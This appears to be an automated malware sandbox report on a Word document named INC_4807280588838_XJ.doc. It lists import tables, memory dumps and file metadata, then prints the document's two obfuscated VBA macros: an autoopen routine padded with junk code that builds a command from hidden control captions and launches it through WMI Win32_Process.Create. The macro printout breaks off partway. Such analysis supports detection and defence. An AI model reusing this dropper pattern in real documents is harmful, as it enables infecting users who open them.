ScaleWindowExtEx | 0x0 | 0x447044 | 0x57f28 | 0x56d28 | 0x259 |
GetCurrentPositionEx | 0x0 | 0x447048 | 0x57f2c | 0x56d2c | 0x1af |
DeleteDC | 0x0 | 0x44704c | 0x57f30 | 0x56d30 | 0xcd |
CreatePatternBrush | 0x0 | 0x447050 | 0x57f34 | 0x56d34 | 0x48 |
CreateCompatibleDC | 0x0 | 0x447054 | 0x57f38 | 0x56d38 | 0x2e |
GetStockObject | 0x0 | 0x447058 | 0x57f3c | 0x56d3c | 0x1f4 |
CreatePen | 0x0 | 0x44705c | 0x57f40 | 0x56d40 | 0x49 |
CreateCompatibleBitmap | 0x0 | 0x447060 | 0x57f44 | 0x56d44 | 0x2d |
GetTextExtentPoint32W | 0x0 | 0x447064 | 0x57f48 | 0x56d48 | 0x205 |
GetCharWidthW | 0x0 | 0x447068 | 0x57f4c | 0x56d4c | 0x1a7 |
CreateFontW | 0x0 | 0x44706c | 0x57f50 | 0x56d50 | 0x3f |
StretchDIBits | 0x0 | 0x447070 | 0x57f54 | 0x56d54 | 0x29b |
SetWindowExtEx | 0x0 | 0x447074 | 0x57f58 | 0x56d58 | 0x293 |
Rectangle | 0x0 | 0x447078 | 0x57f5c | 0x56d5c | 0x246 |
PatBlt | 0x0 | 0x44707c | 0x57f60 | 0x56d60 | 0x22d |
StartPage | 0x0 | 0x447080 | 0x57f64 | 0x56d64 | 0x299 |
EndPage | 0x0 | 0x447084 | 0x57f68 | 0x56d68 | 0xdd |
SetAbortProc | 0x0 | 0x447088 | 0x57f6c | 0x56d6c | 0x260 |
AbortDoc | 0x0 | 0x44708c | 0x57f70 | 0x56d70 | 0x0 |
EndDoc | 0x0 | 0x447090 | 0x57f74 | 0x56d74 | 0xdb |
CreateFontIndirectW | 0x0 | 0x447094 | 0x57f78 | 0x56d78 | 0x3e |
GetBkColor | 0x0 | 0x447098 | 0x57f7c | 0x56d7c | 0x193 |
GetNearestColor | 0x0 | 0x44709c | 0x57f80 | 0x56d80 | 0x1dd |
GetBkMode | 0x0 | 0x4470a0 | 0x57f84 | 0x56d84 | 0x194 |
GetPolyFillMode | 0x0 | 0x4470a4 | 0x57f88 | 0x56d88 | 0x1ed |
GetROP2 | 0x0 | 0x4470a8 | 0x57f8c | 0x56d8c | 0x1ee |
GetStretchBltMode | 0x0 | 0x4470ac | 0x57f90 | 0x56d90 | 0x1f5 |
GetTextColor | 0x0 | 0x4470b0 | 0x57f94 | 0x56d94 | 0x1ff |
GetTextAlign | 0x0 | 0x4470b4 | 0x57f98 | 0x56d98 | 0x1fb |
GetTextFaceW | 0x0 | 0x4470b8 | 0x57f9c | 0x56d9c | 0x20b |
GetTextExtentPoint32A | 0x0 | 0x4470bc | 0x57fa0 | 0x56da0 | 0x204 |
GetWindowOrgEx | 0x0 | 0x4470c0 | 0x57fa4 | 0x56da4 | 0x213 |
SetWindowOrgEx | 0x0 | 0x4470c4 | 0x57fa8 | 0x56da8 | 0x294 |
ScaleViewportExtEx | 0x0 | 0x4470c8 | 0x57fac | 0x56dac | 0x258 |
SetViewportExtEx | 0x0 | 0x4470cc | 0x57fb0 | 0x56db0 | 0x28f |
OffsetViewportOrgEx | 0x0 | 0x4470d0 | 0x57fb4 | 0x56db4 | 0x225 |
SetViewportOrgEx | 0x0 | 0x4470d4 | 0x57fb8 | 0x56db8 | 0x290 |
SelectObject | 0x0 | 0x4470d8 | 0x57fbc | 0x56dbc | 0x25e |
Escape | 0x0 | 0x4470dc | 0x57fc0 | 0x56dc0 | 0x119 |
ExtTextOutW | 0x0 | 0x4470e0 | 0x57fc4 | 0x56dc4 | 0x123 |
TextOutW | 0x0 | 0x4470e4 | 0x57fc8 | 0x56dc8 | 0x2a0 |
RectVisible | 0x0 | 0x4470e8 | 0x57fcc | 0x56dcc | 0x245 |
PtVisible | 0x0 | 0x4470ec | 0x57fd0 | 0x56dd0 | 0x241 |
StartDocW | 0x0 | 0x4470f0 | 0x57fd4 | 0x56dd4 | 0x297 |
GetPixel | 0x0 | 0x4470f4 | 0x57fd8 | 0x56dd8 | 0x1eb |
BitBlt | 0x0 | 0x4470f8 | 0x57fdc | 0x56ddc | 0x12 |
GetViewportOrgEx | 0x0 | 0x4470fc | 0x57fe0 | 0x56de0 | 0x210 |
CreateSolidBrush | 0x0 | 0x447100 | 0x57fe4 | 0x56de4 | 0x52 |
GetViewportExtEx | 0x0 | 0x447104 | 0x57fe8 | 0x56de8 | 0x20f |
GetObjectW | 0x0 | 0x447108 | 0x57fec | 0x56dec | 0x1e4 |
DeleteObject | 0x0 | 0x44710c | 0x57ff0 | 0x56df0 | 0xd0 |
SetTextAlign | 0x0 | 0x447110 | 0x57ff4 | 0x56df4 | 0x28b |
MoveToEx | 0x0 | 0x447114 | 0x57ff8 | 0x56df8 | 0x221 |
LineTo | 0x0 | 0x447118 | 0x57ffc | 0x56dfc | 0x21d |
IntersectClipRect | 0x0 | 0x44711c | 0x58000 | 0x56e00 | 0x217 |
ExcludeClipRect | 0x0 | 0x447120 | 0x58004 | 0x56e04 | 0x11c |
GetClipBox | 0x0 | 0x447124 | 0x58008 | 0x56e08 | 0x1aa |
SetMapMode | 0x0 | 0x447128 | 0x5800c | 0x56e0c | 0x27b |
SetTextColor | 0x0 | 0x44712c | 0x58010 | 0x56e10 | 0x28d |
SetStretchBltMode | 0x0 | 0x447130 | 0x58014 | 0x56e14 | 0x289 |
SetROP2 | 0x0 | 0x447134 | 0x58018 | 0x56e18 | 0x286 |
SetPolyFillMode | 0x0 | 0x447138 | 0x5801c | 0x56e1c | 0x285 |
SetBkMode | 0x0 | 0x44713c | 0x58020 | 0x56e20 | 0x266 |
SetBkColor | 0x0 | 0x447140 | 0x58024 | 0x56e24 | 0x265 |
RestoreDC | 0x0 | 0x447144 | 0x58028 | 0x56e28 | 0x250 |
SaveDC | 0x0 | 0x447148 | 0x5802c | 0x56e2c | 0x257 |
CreateDCW | 0x0 | 0x44714c | 0x58030 | 0x56e30 | 0x30 |
Ellipse | 0x0 | 0x447150 | 0x58034 | 0x56e34 | 0xd9 |
CreateEllipticRgn | 0x0 | 0x447154 | 0x58038 | 0x56e38 | 0x36 |
CreateBitmap | 0x0 | 0x447158 | 0x5803c | 0x56e3c | 0x28 |
LPtoDP | 0x0 | 0x44715c | 0x58040 | 0x56e40 | 0x21b |
GetDeviceCaps | 0x0 | 0x447160 | 0x58044 | 0x56e44 | 0x1b5 |
DPtoLP | 0x0 | 0x447164 | 0x58048 | 0x56e48 | 0x92 |
GetTextMetricsW | 0x0 | 0x447168 | 0x5804c | 0x56e4c | 0x20d |
GetWindowExtEx | 0x0 | 0x44716c | 0x58050 | 0x56e50 | 0x212 |
COMDLG32.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetFileTitleW | 0x0 | 0x44703c | 0x57f20 | 0x56d20 | 0xa |
WINSPOOL.DRV (4)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetJobW | 0x0 | 0x447684 | 0x58568 | 0x57368 | 0x76 |
DocumentPropertiesW | 0x0 | 0x447688 | 0x5856c | 0x5736c | 0x4e |
ClosePrinter | 0x0 | 0x44768c | 0x58570 | 0x57370 | 0x1d |
OpenPrinterW | 0x0 | 0x447690 | 0x58574 | 0x57374 | 0x8f |
ADVAPI32.dll (14)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
RegDeleteValueW | 0x0 | 0x447000 | 0x57ee4 | 0x56ce4 | 0x242 |
RegSetValueExW | 0x0 | 0x447004 | 0x57ee8 | 0x56ce8 | 0x278 |
RegCreateKeyExW | 0x0 | 0x447008 | 0x57eec | 0x56cec | 0x233 |
RegQueryValueW | 0x0 | 0x44700c | 0x57ef0 | 0x56cf0 | 0x269 |
RegOpenKeyW | 0x0 | 0x447010 | 0x57ef4 | 0x56cf4 | 0x25e |
RegEnumKeyW | 0x0 | 0x447014 | 0x57ef8 | 0x56cf8 | 0x24a |
RegDeleteKeyW | 0x0 | 0x447018 | 0x57efc | 0x56cfc | 0x23e |
RegOpenKeyExW | 0x0 | 0x44701c | 0x57f00 | 0x56d00 | 0x25b |
RegQueryValueExW | 0x0 | 0x447020 | 0x57f04 | 0x56d04 | 0x268 |
GetFileSecurityW | 0x0 | 0x447024 | 0x57f08 | 0x56d08 | 0x12a |
SetFileSecurityW | 0x0 | 0x447028 | 0x57f0c | 0x56d0c | 0x2a4 |
RegSetValueW | 0x0 | 0x44702c | 0x57f10 | 0x56d10 | 0x279 |
RegCloseKey | 0x0 | 0x447030 | 0x57f14 | 0x56d14 | 0x22a |
RegCreateKeyW | 0x0 | 0x447034 | 0x57f18 | 0x56d18 | 0x236 |
SHELL32.dll (4)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
DragFinish | 0x0 | 0x4473c8 | 0x582ac | 0x570ac | 0x1c |
SHGetFileInfoW | 0x0 | 0x4473cc | 0x582b0 | 0x570b0 | 0xba |
ExtractIconW | 0x0 | 0x4473d0 | 0x582b4 | 0x570b4 | 0x2c |
DragQueryFileW | 0x0 | 0x4473d4 | 0x582b8 | 0x570b8 | 0x20 |
SHLWAPI.dll (5)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
PathFindFileNameW | 0x0 | 0x4473dc | 0x582c0 | 0x570c0 | 0x49 |
PathStripToRootW | 0x0 | 0x4473e0 | 0x582c4 | 0x570c4 | 0x97 |
PathIsUNCW | 0x0 | 0x4473e4 | 0x582c8 | 0x570c8 | 0x71 |
PathFindExtensionW | 0x0 | 0x4473e8 | 0x582cc | 0x570cc | 0x47 |
PathRemoveFileSpecW | 0x0 | 0x4473ec | 0x582d0 | 0x570d0 | 0x8b |
ole32.dll (8)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
CoInitializeEx | 0x0 | 0x447698 | 0x5857c | 0x5737c | 0x3e |
CoUninitialize | 0x0 | 0x44769c | 0x58580 | 0x57380 | 0x6b |
OleDestroyMenuDescriptor | 0x0 | 0x4476a0 | 0x58584 | 0x57384 | 0xeb |
OleCreateMenuDescriptor | 0x0 | 0x4476a4 | 0x58588 | 0x57388 | 0xe9 |
IsAccelerator | 0x0 | 0x4476a8 | 0x5858c | 0x5738c | 0xcd |
OleTranslateAccelerator | 0x0 | 0x4476ac | 0x58590 | 0x57390 | 0x10a |
CoCreateInstance | 0x0 | 0x4476b0 | 0x58594 | 0x57394 | 0x10 |
CoTaskMemFree | 0x0 | 0x4476b4 | 0x58598 | 0x57398 | 0x67 |
OLEAUT32.dll (5)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
VarDateFromStr | 0x5e | 0x4473b0 | 0x58294 | 0x57094 | - |
SysAllocStringLen | 0x4 | 0x4473b4 | 0x58298 | 0x57098 | - |
VariantClear | 0x9 | 0x4473b8 | 0x5829c | 0x5709c | - |
VariantChangeType | 0xc | 0x4473bc | 0x582a0 | 0x570a0 | - |
VariantInit | 0x8 | 0x4473c0 | 0x582a4 | 0x570a4 | - |
Memory Dumps (93)
»
Name | Process ID | Start VA | End VA | Dump Reason | PE Rebuild | Bitness | Entry Points | AV | YARA | Actions |
---|---|---|---|---|---|---|---|---|---|---|
buffer | 6 | 0x00350000 | 0x00350FFF | First Execution | - | 32-bit | 0x00350000 |
...
|
||
buffer | 6 | 0x00330000 | 0x00344FFF | First Execution | - | 32-bit | 0x00330000 |
...
|
||
buffer | 8 | 0x002F0000 | 0x002F0FFF | First Execution | - | 32-bit | 0x002F0000 |
...
|
||
buffer | 8 | 0x00240000 | 0x00254FFF | First Execution | - | 32-bit | 0x00240000 |
...
|
||
buffer | 10 | 0x00270000 | 0x00270FFF | First Execution | - | 32-bit | 0x00270000 |
...
|
||
buffer | 10 | 0x003A0000 | 0x003B4FFF | First Execution | - | 32-bit | 0x003A0000 |
...
|
||
buffer | 10 | 0x003D0000 | 0x003E5FFF | Marked Executable | - | 32-bit | 0x003D1900 |
...
|
||
buffer | 12 | 0x00270000 | 0x00270FFF | First Execution | - | 32-bit | 0x00270000 |
...
|
||
buffer | 12 | 0x00300000 | 0x00314FFF | First Execution | - | 32-bit | 0x00300000 |
...
|
||
buffer | 12 | 0x00340000 | 0x00355FFF | Marked Executable | - | 32-bit | 0x00341900 |
...
|
||
buffer | 13 | 0x00D80000 | 0x00DACFFF | First Execution | - | 32-bit | 0x00D873A0 |
...
|
||
buffer | 13 | 0x00D80000 | 0x00DACFFF | Content Changed | - | 32-bit | 0x00D8D210 |
...
|
||
buffer | 13 | 0x00D80000 | 0x00DACFFF | Content Changed | - | 32-bit | 0x00D8C550 |
...
|
||
buffer | 13 | 0x00D80000 | 0x00DACFFF | Content Changed | - | 32-bit | 0x00D8B950 |
...
|
||
buffer | 13 | 0x00D80000 | 0x00DACFFF | Content Changed | - | 32-bit | 0x00D8AF00 |
...
|
||
buffer | 13 | 0x00D80000 | 0x00DACFFF | Content Changed | - | 32-bit | 0x00D89000 |
...
|
||
buffer | 13 | 0x00D80000 | 0x00DACFFF | Content Changed | - | 32-bit | 0x00D823F0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | First Execution | - | 32-bit | 0x02E86D8E |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E8E090 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E87CB7 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E8C3E8 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E882DF |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E95F88 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E8C4C1 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E86C45 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E8705F |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E887F0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E90FA0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E9AE50 |
...
|
||
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | - |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DBCCA0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DBBEE0 |
...
|
||
buffer | 13 | 0x00D80000 | 0x00DACFFF | Content Changed | - | 32-bit | 0x00D8D45A |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DB7050 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DB8000 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DBA000 |
...
|
||
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | 0x0041211A |
...
|
||
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | 0x00404841 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E62480 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DC4C90 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DC0500 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DC8650 |
...
|
||
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | 0x00406A5B |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DCB7A0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DE1BD0 |
...
|
||
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | 0x00402393 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DCA1E0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DDEF70 |
...
|
||
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | 0x0040A16F |
...
|
||
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | 0x00405F29 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DC9880 |
...
|
||
768.exe | 15 | 0x00400000 | 0x0047FFFF | Content Changed | - | 32-bit | 0x00403C17 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DD3110 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E68210 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E1D4B0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DB26A0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DB5000 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DBDF20 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E60010 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E61A90 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E8A194 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DC32A0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E4CCB0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E80890 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E073C0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E636C0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E5EF60 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E76220 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E78490 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E6E340 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E6CE00 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E7AF40 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E119F0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E15EB0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E14EA0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DD37D0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DD4CA0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DC0060 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E6A290 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E6E340 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E6CE00 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E69CD0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DE0F80 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E1E7E0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E3B1B0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E31470 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DD95D0 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E4A180 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E46610 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E953D2 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DCA220 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02E2B600 |
...
|
||
buffer | 13 | 0x02DB0000 | 0x02F11FFF | Content Changed | - | 32-bit | 0x02DFFC70 |
...
|
c97833e6456aa2bfe9be614f9c3ae41a8ef764b1cc3af92c6a6f273c62309122 | Embedded File | Text |
Whitelisted
|
...
|
»
File Reputation Information
»
Severity |
Whitelisted
|
First Seen | 2012-11-16 07:03 (UTC+1) |
Last Seen | 2019-09-09 16:32 (UTC+2) |
ec73a93e583de41cceef114addca1400548914e11245fcb22fc404a6b9e97e6c | Embedded File | Text |
Whitelisted
|
...
|
»
File Reputation Information
»
Severity |
Whitelisted
|
First Seen | 2015-09-23 11:28 (UTC+2) |
Last Seen | 2019-07-04 20:54 (UTC+2) |
C:\Users\aETAdzjz\Desktop\INC_4807280588838_XJ.doc | Sample File | Word Document |
Unknown
|
...
|
»
Office Information
»
Revision | 1 |
Create Time | 2019-09-16 06:30:00+00:00 |
Modify Time | 2019-09-16 06:30:00+00:00 |
Document Information
»
Application | Microsoft Office Word |
App Version | 16.0000 |
Template | Normal.dotm |
Document Security | SecurityFlag.NONE |
Page Count | 1 |
Line Count | 5 |
Paragraph Count | 1 |
Word Count | 110 |
Character Count | 632 |
Chars With Spaces | 741 |
ScaleCrop | |
SharedDoc |
Controls (1)
»
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{8BD21D50-EC42-11CE-9E0D-00AA006002F3} | FormsOptionButton | - |
VBA Macros (2)
»
Macro #1: EE6Y9p8Z
»
Attribute VB_Name = "EE6Y9p8Z"
Function j3wwFfB()
Dim r8W_ZQh As Object
If 12 = 289 Then
Dim E1_zc9tZ As Boolean
Select Case wVIkFm2Y
Case 738
Dim WDqijP8j As Boolean
TZjCBSi = rlJAoATs
Dim Ti3Bbj As Boolean
aONBK0 = 664
Dim bwGjzIQ As Boolean
TSCBiPi = CVar(84)
Dim C1jXHj As Boolean
Case 124
Dim wXuzbL As Boolean
YimziP = SEO_HB_
Dim t7m6Jpk As Boolean
H4s28Gi = CVar(k7zwwi)
Dim CS_B9Y As Boolean
cP9TU5C = 65
Dim FZsjHHjU As Boolean
End Select
End If
Set j3wwFfB = CreateObject(nCRX1MBI + ThisDocument.jq5ZKGz9.Caption + "Startup" + Od4G1G)
Dim MZTz7tmB As Object
If 630 = 840 Then
Dim H0szNTi As Boolean
Select Case Y5nmfmUs
Case 731
Dim cmniVp As Boolean
LwiYzw9r = htIJdOo
Dim ozLlBp_ As Boolean
biXHsiQZ = 275
Dim F1owf5 As Boolean
uYJY2U = CVar(50)
Dim zCMjtw1D As Boolean
Case 616
Dim DjAl5D3 As Boolean
pIAqs9ZG = GnDF0kNN
Dim PAlo31i As Boolean
ZFjTZP = CVar(TijUrOTB)
Dim WCAr1C As Boolean
piWz3aK = 763
Dim imUp1Y As Boolean
End Select
End If
j3wwFfB. _
ShowWindow! _
= SiZBGQU + j5jUXu + RS03Kw + mrEwuf8s + Gju7AC + UPi25t
Dim Yji58I As Object
If 137 = 979 Then
Dim paz1mk As Boolean
Select Case R1OSdi
Case 254
Dim Rj_nOQ As Boolean
cvjwboW = KE9iMqi
Dim UwZ5t_SO As Boolean
HFzhAJR = 455
Dim Busd94 As Boolean
NwI5cUi = CVar(66)
Dim LpBjfNE As Boolean
Case 780
Dim Qai8Z7 As Boolean
NArUcAc = YaisvS
Dim vn1bhhn As Boolean
d23TWNE6 = CVar(IRzok_d)
Dim aajI3ii As Boolean
EudD2mbl = 970
Dim FNZzrwfI As Boolean
End Select
End If
Dim SjlWKpU As Object
If 626 = 278 Then
Dim zwGhvZJ As Boolean
Select Case bh9sYic
Case 265
Dim cjBaUi As Boolean
ls9wrdY = AKpluX
Dim i3poID As Boolean
Rwbjhbna = 675
Dim X121DkjX As Boolean
ouzM8T = CVar(336)
Dim W0loDEW As Boolean
Case 640
Dim idjiPiD6 As Boolean
nwFIvh = f8PjOtB0
Dim pwwiVn As Boolean
zuiQwRrC = CVar(S21HbIvw)
Dim M2hQV9 As Boolean
ZRccR3j = 731
Dim RL94LvN As Boolean
End Select
End If
End Function
Sub autoopen()
Dim uo2GtE As Object
If 520 = 161 Then
Dim YYCwG5 As Boolean
Select Case K8iZCb6W
Case 349
Dim T8N3UA As Boolean
ndlRFm9 = RqhB3RW
Dim zL0cui As Boolean
ku7lDBJ = 326
Dim IX737c As Boolean
dr4Tfq = CVar(22)
Dim DBaiTt As Boolean
Case 39
Dim j6N0wRp As Boolean
mH03ZDt = Iw1FMED
Dim zuK1bQXK As Boolean
HOSBf7 = CVar(uLq0rn4)
Dim mltJ6Q As Boolean
hM6rsfO = 540
Dim jM4wUJb As Boolean
End Select
End If
Ujrahq0
Dim BdiCCt As Object
If 538 = 653 Then
Dim tDczzL As Boolean
Select Case XzJ8Cr9
Case 844
Dim DiwDsm As Boolean
bt60M1q = kmj2F6A
Dim VPRFVjrz As Boolean
aAKcGL = 334
Dim vjQ9iwr As Boolean
OZ0ow85 = CVar(57)
Dim ScYZRZ As Boolean
Case 705
Dim jUhKZq1 As Boolean
iicwjY = VY_huE
Dim AzwEjP As Boolean
zFXbL3 = CVar(KqWVtU)
Dim BP3B49 As Boolean
N6Z2CX = 933
Dim kXzbB70 As Boolean
End Select
End If
End Sub
Macro #2: ntowNDG
»
Attribute VB_Name = "ntowNDG"
Function Ujrahq0()
Dim XTVQ0Ka As Object
If 425 = 372 Then
Dim z0KWiS As Boolean
Select Case YVd2Gj
Case 984
Dim LhppX1 As Boolean
p0CfSMzw = O8rwLmp
Dim FEpWzJK As Boolean
nztJ8Zj = 321
Dim HwRhpk As Boolean
MZaVC_ = CVar(393)
Dim wrImPV As Boolean
Case 303
Dim JDisHAR As Boolean
SfJOkZFs = nUSszT1A
Dim uAzqzVm As Boolean
GOILqriQ = CVar(PD6raXI)
Dim jZRAjzw As Boolean
YaOw0vbr = 692
Dim jBSCvo As Boolean
End Select
End If
jKSWHV = dkCEwiB + ThisDocument.jZdtBt.Caption + ThisDocument.IQWa7VJ.Caption + ThisDocument.dqnHAG.Caption + Da3HRzw5
Dim BLS3b6GT As Object
If 35 = 585 Then
Dim zX9j8oQ As Boolean
Select Case cn5Gc2
Case 978
Dim w9omBk As Boolean
BTmn3mX = HI0w4aZ
Dim hUIE1AO As Boolean
S2A7zY = 446
Dim RpDV8P4i As Boolean
LXFhOvj8 = CVar(637)
Dim wdlZFdB As Boolean
Case 919
Dim LWlz8Fv As Boolean
kFQljS = DzmQZ1I
Dim tDpQdNt4 As Boolean
hkIci8X = CVar(HV8TZr)
Dim cWwjcM As Boolean
jI5O3i = 754
Dim wWz7XIT As Boolean
End Select
End If
Dim dKvih5tn As Object
If 698 = 831 Then
Dim t7J3cObZ As Boolean
Select Case XtsFhNXw
Case 787
Dim viqpkr As Boolean
iMcz6Nck = Lmk_HVN2
Dim wTj7sjBU As Boolean
OwntzEa = 197
Dim Zn9zrjSv As Boolean
QbuO8wS = CVar(244)
Dim FZMIU6a As Boolean
Case 247
Dim sKD7kC9C As Boolean
rWZwF57 = cq8hY4h
Dim Zo5RHT As Boolean
TY3sQ5wz = CVar(knGPY3)
Dim Q6oqDCnp As Boolean
fjPG4Vj = 31
Dim rSzJui As Boolean
End Select
End If
wpLnXI = CreateObject("winm" + "gmts:Win32_Process").Create(jKSWHV + Gn9GzS, n9NZUAO, j3wwFfB, bfhbrw)
Dim KNk_lPH As Object
If 358 = 649 Then
Dim fH5f2i6 As Boolean
Select Case P7FFV2
Case 711
Dim pCzsNwcp As Boolean
LMwfjZ = I2uL5muE
Dim SH3uZmc As Boolean
hZTc2J = 511
Dim XjzWquZr As Boolean
fJL9Ju = CVar(562)
